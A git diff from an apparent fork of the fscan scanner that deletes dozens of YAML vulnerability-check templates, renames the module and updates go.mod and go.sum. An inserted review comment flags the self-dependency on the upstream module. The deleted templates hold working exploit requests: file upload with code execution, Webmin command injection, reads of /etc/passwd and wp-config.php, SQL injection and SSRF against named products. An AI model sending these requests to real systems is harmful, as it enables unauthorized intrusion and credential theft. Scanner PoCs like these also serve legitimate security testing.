@@ -1,16 +0,0 @@ -name: poc-yaml-tongda-user-session-disclosure -rules: - - method: GET - path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 - follow_redirects: false - expression: "true" - - - method: POST - path: /general/userinfo.php?UID=1 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json") -detail: - author: kzaopa(https://github.com/kzaopa) - links: - - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ \ No newline at end of file diff --git a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml b/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml deleted file mode 100644 index 19b9ba6..0000000 --- a/WebScan/pocs/ueditor-cnvd-2017-20077-file-upload.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ueditor-cnvd-2017-20077-file-upload -rules: - - method: GET - path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 - headers: - Accept-Encoding: 'deflate' - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源"))) -detail: - author: 清风明月(www.secbook.info) - influence_version: 'UEditor v1.4.3.3' - links: - - https://zhuanlan.zhihu.com/p/85265552 - - https://www.freebuf.com/vuls/181814.html - exploit: >- - http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8 diff --git a/WebScan/pocs/vengd-upload-rce.yml b/WebScan/pocs/vengd-upload-rce.yml deleted file mode 100644 index deaec2f..0000000 --- a/WebScan/pocs/vengd-upload-rce.yml +++ /dev/null 
@@ -1,25 +0,0 @@ -name: poc-yaml-vengd-upload-rce -set: - r1: randomLowercase(4) - r2: randomLowercase(4) - r3: randomInt(40000, 44800) - r4: randomInt(40000, 44800) -rules: - - method: POST - path: /Upload/upload_file.php?l={{r1}} - headers: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv - body: |- - ------WebKitFormBoundaryfcKRltGv - Content-Disposition: form-data; name="file"; filename="{{r2}}.php" - Content-Type: image/avif - - ------WebKitFormBoundaryfcKRltGv-- - expression: response.status == 200 && response.body.bcontains(b"_Request:") - - method: GET - path: '/Upload/{{r1}}/{{r2}}.php' - expression: response.status == 200 && response.body.bcontains(bytes(string(r3 * r4))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml deleted file mode 100644 index a32c5c2..0000000 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-vmware-vcenter-arbitrary-file-read -rules: - - method: GET - path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml deleted file mode 100644 index 064aa10..0000000 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-vmware-vcenter-arbitrary-file-read2 -rules: - - method: GET - path: /eam/vib?id=/etc/passwd - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://t.co/LfvbyBUhF5 diff --git a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml b/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml deleted file mode 100644 index 6d3b795..0000000 --- a/WebScan/pocs/vmware-vcenter-cve-2021-21985-rce.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-vmware-vcenter-cve-2021-21985-rce -rules: - - method: POST - path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - headers: - Content-Type: application/json - body: |- - {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a - expression: | - response.status == 200 && response.body.bcontains(b"result") -detail: - vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData" - author: envone77 - description: "vmware vCenter unauth RCE cve-2021-21985" - links: - - https://www.anquanke.com/post/id/243098 - - https://github.com/alt3kx/CVE-2021-21985_PoC \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml b/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml deleted file mode 100644 index c2ed9a9..0000000 --- a/WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml +++ /dev/null 
@@ -1,16 +0,0 @@ -name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972 -rules: - - method: GET - path: /ui/vropspluginui/rest/services/uploadova - follow_redirects: false - expression: | - response.status == 405 && response.body.bcontains(b"Method Not Allowed") - - method: GET - path: /ui/vropspluginui/rest/services/getstatus - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress") -detail: - author: B1anda0(https://github.com/B1anda0) - links: - - https://swarm.ptsecurity.com/unauth-rce-vmware/ \ No newline at end of file diff --git a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml deleted file mode 100644 index 6b27d65..0000000 --- a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf -rules: - - method: POST - path: /casa/nodes/thumbprints - headers: - Content-Type: application/json - body: | - ["127.0.0.1:443/ui/"] - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) -detail: - author: Loneyer - links: - - https://www.vmware.com/security/advisories/VMSA-2021-0004.html \ No newline at end of file diff --git a/WebScan/pocs/weaver-ebridge-file-read-linux.yml b/WebScan/pocs/weaver-ebridge-file-read-linux.yml deleted file mode 100644 index 47d9379..0000000 --- a/WebScan/pocs/weaver-ebridge-file-read-linux.yml +++ /dev/null 
@@ -1,19 +0,0 @@ -name: poc-yaml-weaver-ebridge-file-read-linux -rules: - - method: GET - path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt" - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") - search: | - \"id\"\:\"(?P.+?)\"\, - - method: GET - path: "/file/fileNoLogin/{{var}}" - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: mvhz81 - info: e-bridge-file-read for Linux - links: - - https://mrxn.net/Infiltration/323.html diff --git a/WebScan/pocs/weaver-ebridge-file-read-windows.yml b/WebScan/pocs/weaver-ebridge-file-read-windows.yml deleted file mode 100644 index cb06435..0000000 --- a/WebScan/pocs/weaver-ebridge-file-read-windows.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-weaver-ebridge-file-read-windows -rules: - - method: GET - path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id") - search: | - \"id\"\:\"(?P.+?)\"\, - - method: GET - path: /file/fileNoLogin/{{var}} - follow_redirects: false - expression: | - response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) -detail: - author: mvhz81 - info: e-bridge-file-read for windows - links: - - https://mrxn.net/Infiltration/323.html diff --git a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml b/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml deleted file mode 100644 index f37b591..0000000 --- a/WebScan/pocs/weaver-oa-arbitrary-file-upload.yml +++ /dev/null 
@@ -1,24 +0,0 @@ -name: poc-yaml-weaver-oa-arbitrary-file-upload -set: - r1: randomLowercase(4) - r2: randomInt(40000, 44800) - r3: randomInt(40000, 44800) -rules: - - method: POST - path: /page/exportImport/uploadOperation.jsp - headers: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo - body: |- - ------WebKitFormBoundaryFy3iNVBftjP6IOwo - Content-Disposition: form-data; name="file"; filename="{{r1}}.jsp" - Content-Type: application/octet-stream - <%out.print({{r2}} * {{r3}});%> - ------WebKitFormBoundaryFy3iNVBftjP6IOwo-- - expression: response.status == 200 - - method: GET - path: '/page/exportImport/fileTransfer/{{r1}}.jsp' - expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/weblogic-cve-2020-14750.yml b/WebScan/pocs/weblogic-cve-2020-14750.yml deleted file mode 100644 index 8db8464..0000000 --- a/WebScan/pocs/weblogic-cve-2020-14750.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-weblogic-cve-2020-14750 -rules: - - method: GET - path: /console/images/%252E./console.portal - follow_redirects: false - expression: | - (response.status == 302 && response.body.bcontains(bytes("/console/console.portal")) || response.body.bcontains(bytes("/console.portal?_nfpb=true"))) -detail: - author: canc3s(https://github.com/canc3s),Soveless(https://github.com/Soveless) - weblogic_version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 - links: - - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html diff --git a/WebScan/pocs/weblogic-ssrf.yml b/WebScan/pocs/weblogic-ssrf.yml deleted file mode 100644 index 1c84c1c..0000000 --- a/WebScan/pocs/weblogic-ssrf.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-weblogic-ssrf -rules: - - method: GET - path: >- - /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 - headers: - Cookie: >- - publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; - follow_redirects: false - expression: >- - response.status == 200 && (response.body.bcontains(b"'127.1.1.1', port: '700'") || response.body.bcontains(b"Socket Closed")) diff --git a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml b/WebScan/pocs/weblogic-v10-cve-2017-10271.yml deleted file mode 100644 index 1468f14..0000000 --- a/WebScan/pocs/weblogic-v10-cve-2017-10271.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-weblogic-cve-2017-10271 # nolint[:namematch] -rules: - - method: POST - path: /wls-wsat/CoordinatorPortType - headers: - Content-Type: text/xml - body: >- - 505053555551485749 - follow_redirects: true - expression: > - response.body.bcontains(b"225773091") -detail: - vulnpath: '/wls-wsat/CoordinatorPortType' - author: fnmsd(https://github.com/fnmsd) - description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271' - weblogic_version: '10' - links: - - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 - - https://github.com/QAX-A-Team/WeblogicEnvironment - - https://xz.aliyun.com/t/5299 \ No newline at end of file diff --git a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml b/WebScan/pocs/weblogic-v12-cve-2019-2725.yml deleted file mode 100644 index 176adae..0000000 --- a/WebScan/pocs/weblogic-v12-cve-2019-2725.yml +++ /dev/null 
@@ -1,20 +0,0 @@ -name: poc-yaml-weblogic-cve-2019-2725 # nolint[:namematch] -rules: - - method: POST - path: /wls-wsat/CoordinatorPortType - headers: - Content-Type: text/xml - body: >- - fffhelloorg.slf4j.ext.EventDataconnectionHandlertrue505053555551485749]]> - follow_redirects: true - expression: > - response.body.bcontains(b"225773091") -detail: - vulnpath: '/wls-wsat/CoordinatorPortType' - author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166) - description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2019-2725 + org.slf4j.ext.EventData' - weblogic_version: '>12' - links: - - https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271 - - https://github.com/QAX-A-Team/WeblogicEnvironment - - https://xz.aliyun.com/t/5299 \ No newline at end of file diff --git a/WebScan/pocs/webmin-cve-2019-15107-rce.yml b/WebScan/pocs/webmin-cve-2019-15107-rce.yml deleted file mode 100644 index 9a7a1ce..0000000 --- a/WebScan/pocs/webmin-cve-2019-15107-rce.yml +++ /dev/null @@ -1,18 +0,0 @@ -name: poc-yaml-webmin-cve-2019-15107-rce -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /password_change.cgi - headers: - Referer: "{{url}}" - body: user=roovt&pam=&expired=2&old=expr%20{{r1}}%20%2b%20{{r2}}&new1=test2&new2=test2 - follow_redirects: false - expression: > - response.body.bcontains(bytes(string(r1 + r2))) -detail: - author: danta - description: Webmin 远程命令执行漏洞(CVE-2019-15107) - links: - - https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107 diff --git a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml b/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml deleted file mode 100644 index 5d75468..0000000 --- a/WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml +++ /dev/null 
@@ -1,11 +0,0 @@ -name: poc-yaml-wordpress-cve-2019-19985-infoleak -rules: - - method: GET - path: "/wp-admin/admin.php?page=download_report&report=users&status=all" - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"])) -detail: - author: bufsnake(https://github.com/bufsnake) - links: - - https://www.exploit-db.com/exploits/48698 diff --git a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml b/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml deleted file mode 100644 index a26f05d..0000000 --- a/WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-wordpress-ext-adaptive-images-lfi -rules: - - method: GET - path: >- - /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php - follow_redirects: false - expression: > - response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://www.anquanke.com/vul/id/1674598 - - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 diff --git a/WebScan/pocs/wordpress-ext-mailpress-rce.yml b/WebScan/pocs/wordpress-ext-mailpress-rce.yml deleted file mode 100644 index 523b0f2..0000000 --- a/WebScan/pocs/wordpress-ext-mailpress-rce.yml +++ /dev/null 
@@ -1,23 +0,0 @@ -name: poc-yaml-wordpress-ext-mailpress-rce -set: - r: randomInt(800000000, 1000000000) - r1: randomInt(800000000, 1000000000) -rules: - - method: POST - path: "/wp-content/plugins/mailpress/mp-includes/action.php" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=&html=&plaintext=&mail_format=standard&autosave=1 - expression: "true" - search: | - XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell 'set/A {{r1}}*{{r2}}' - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: MrP01ntSun(https://github.com/MrPointSun) - links: - - https://www.hackbug.net/archives/111.html diff --git a/WebScan/pocs/yonyou-grp-u8-sqli.yml b/WebScan/pocs/yonyou-grp-u8-sqli.yml deleted file mode 100644 index 5fd8452..0000000 --- a/WebScan/pocs/yonyou-grp-u8-sqli.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-yonyou-grp-u8-sqli -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /Proxy - body: > - cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html \ No newline at end of file 
diff --git a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml b/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml deleted file mode 100644 index 8e6b75e..0000000 --- a/WebScan/pocs/yonyou-nc6.5-arbitrary-file-upload.yml +++ /dev/null @@ -1,26 +0,0 @@ -name: poc-yaml-yonyou-nc-arbitrary-file-upload -set: - r1: randomInt(10000, 20000) - r2: randomInt(1000000000, 2000000000) - r3: b"\xac\xed\x00\x05sr\x00\x11java.util.HashMap\x05\a\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\nloadFactorI\x00\tthresholdxp?@\x00\x00\x00\x00\x00\fw\b\x00\x00\x00\x10\x00\x00\x00\x02t\x00\tFILE_NAMEt\x00\t" - r4: b".jspt\x00\x10TARGET_FILE_PATHt\x00\x10./webapps/nc_webx" -rules: - - method: POST - path: /servlet/FileReceiveServlet - headers: - Content-Type: multipart/form-data; - body: >- - {{r3}}{{r1}}{{r4}}<%out.print("{{r2}}");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> - expression: | - response.status == 200 - - method: GET - path: '/{{r1}}.jsp' - headers: - Content-Type: application/x-www-form-urlencoded - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r2))) -detail: - author: pa55w0rd(www.pa55w0rd.online/) - Affected Version: "YONYOU NC > 6.5" - links: - - https://blog.csdn.net/weixin_44578334/article/details/110917053 \ No newline at end of file diff --git a/WebScan/pocs/zabbix-authentication-bypass.yml b/WebScan/pocs/zabbix-authentication-bypass.yml deleted file mode 100644 index 1cc08ab..0000000 --- a/WebScan/pocs/zabbix-authentication-bypass.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-zabbix-authentication-bypass -rules: - - method: GET - path: /zabbix.php?action=dashboard.view&dashboardid=1 - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes("Share")) && response.body.bcontains(b"Dashboard") -detail: - author: FiveAourThe(https://github.com/FiveAourThe) - links: - - https://www.exploit-db.com/exploits/47467 \ No newline at end of file 
diff --git a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml b/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml
deleted file mode 100644
index 494acc6..0000000
--- a/WebScan/pocs/zabbix-cve-2016-10134-sqli.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-zabbix-cve-2016-10134-sqli
-set:
- r: randomInt(2000000000, 2100000000)
-rules:
- - method: GET
- path: >-
- /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0)
- follow_redirects: true
- expression: |
- response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31)))
-detail:
- author: sharecast
- links:
- - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
\ No newline at end of file
diff --git a/go.mod b/go.mod
index b09342a..87b2ac7 100644
--- a/go.mod
+++ b/go.mod
@@ -1,19 +1,20 @@
-module github.com/shadow1ng/fscan
+module github.com/timwhitez/fscan
go 1.16
require (
github.com/denisenkom/go-mssqldb v0.10.0
github.com/go-sql-driver/mysql v1.6.0
- github.com/golang/protobuf v1.3.4
- github.com/google/cel-go v0.6.0
+ github.com/golang/protobuf v1.5.2
+ github.com/google/cel-go v0.7.3
github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067
- github.com/lib/pq v1.10.1
+ github.com/lib/pq v1.10.2
github.com/saintfish/chardet v0.0.0-20120816061221-3af4cd4741ca
+ github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4
github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
- golang.org/x/crypto v0.0.0-20200728195943-123391ffb6de
- golang.org/x/net v0.0.0-20200301022130-244492dfa37a
- golang.org/x/text v0.3.2
- google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
+ golang.org/x/crypto v0.0.0-20210711020723-a769d52b0f97
+ golang.org/x/net v0.0.0-20210716203947-853a461950ff
+ golang.org/x/text v0.3.6
+ google.golang.org/genproto v0.0.0-20210722135532-667f2b7c528f
gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b
)
diff --git a/go.sum b/go.sum
index 341ad2e..09150ac 100644
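Review bot: The added `github.com/shadow1ng/fscan v0.0.0-20210720033146-dc949e25b1a4` require in the go.mod hunk makes this fork depend on its own upstream at the same moment the module path is renamed to `github.com/timwhitez/fscan`, which strongly suggests that some packages in the tree still import the old `github.com/shadow1ng/fscan/...` path and are now resolved from the remote upstream module rather than from this repository. If that is the case, local edits to those packages silently have no effect and the build pulls code from a repository this fork does not control, which is both a correctness and a supply-chain concern. The fix is to rewrite the internal imports to the new module path and drop the require; a subsequent `go mod tidy` will confirm whether anything still needs it. The matching `github.com/shadow1ng/fscan` entries added to go.sum on the following lines would disappear with it.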
--- a/go.sum +++ b/go.sum 
@@ -1,98 +1,187 @@ cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= +cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= +github.com/antihax/optional v1.0.0/go.mod h1:uupD/76wgC+ih3iEmQUL+0Ugr19nfwCT1kdvxnR2qWY= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f h1:0cEys61Sr2hUBEXfNV8eyQP01oZuBgoMeHunebPirK8= github.com/antlr/antlr4 v0.0.0-20200503195918-621b933c7a7f/go.mod h1:T7PbCXFs94rrTttyxjbyT5+/1V8T2TYDejxUfHJjw1Y= github.com/census-instrumentation/opencensus-proto v0.2.1/go.mod h1:f6KPmirojxKA12rnyqOA5BBL4O983OfeGPqjHWSTneU= github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= +github.com/cncf/udpa/go v0.0.0-20191209042840-269d4d468f6f/go.mod h1:M8M6+tZqaGXZJjfX53e64911xZQV5JYwmTeXPW+k8Sc= +github.com/cncf/udpa/go v0.0.0-20201120205902-5459f2c99403/go.mod h1:WmhPx2Nbnhtbo57+VJT5O0JRkEi1Wbu0z5j0R8u5Hbk= +github.com/cncf/xds/go v0.0.0-20210312221358-fbca930ec8ed/go.mod h1:eXthEFrGJvWHgFFCl3hGmgk+/aYT6PnTQLykKQRLhEs= github.com/davecgh/go-spew v1.1.0 h1:ZDRjVQ15GmhC3fiQ8ni8+OwkZQO4DARzQgrnXU1Liz8= github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= github.com/denisenkom/go-mssqldb v0.10.0 h1:QykgLZBorFE95+gO3u9esLd0BmbvpWp0/waNNZfHBM8= github.com/denisenkom/go-mssqldb v0.10.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU= +github.com/envoyproxy/go-control-plane v0.9.0/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4= +github.com/envoyproxy/go-control-plane v0.9.4/go.mod h1:6rpuAdCZL397s3pYoYcLgu1mIlRU8Am5FuJP05cCM98= +github.com/envoyproxy/go-control-plane v0.9.9-0.20201210154907-fd9021fe5dad/go.mod h1:cXg6YxExXjJnVBQHBLXeUAgxn2UodCpnH306RInaBQk= +github.com/envoyproxy/go-control-plane 
v0.9.9-0.20210512163311-63b5d3c536b0/go.mod h1:hliV/p42l8fGbc6Y9bQ70uLwIvmJyVE5k4iMKlh8wCQ= github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c= -github.com/geoffgarside/ber v1.1.0 h1:qTmFG4jJbwiSzSXoNJeHcOprVzZ8Ulde2Rrrifu5U9w= -github.com/geoffgarside/ber v1.1.0/go.mod h1:jVPKeCbj6MvQZhwLYsGwaGI52oUorHoHKNecGT85ZCc= +github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= github.com/go-sql-driver/mysql v1.6.0 h1:BCTh4TKNUYmOmMUcQ3IipzF5prigylS7XXjEkfCHuOE= github.com/go-sql-driver/mysql v1.6.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY= github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0= -github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b h1:VKtxabqXZkF25pY9ekfRL6a582T4P37/31XEstQ5p58= github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q= github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/golang/protobuf v1.3.4 h1:87PNWwrRvUSnqS4dlcBU/ftvOIBep4sYuBLlh6rX2wk= github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= -github.com/google/cel-go v0.6.0 h1:Li+angxmgvzlwDsPuFc1/nbqnq3gc4K/X7NrWjOADFI= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod 
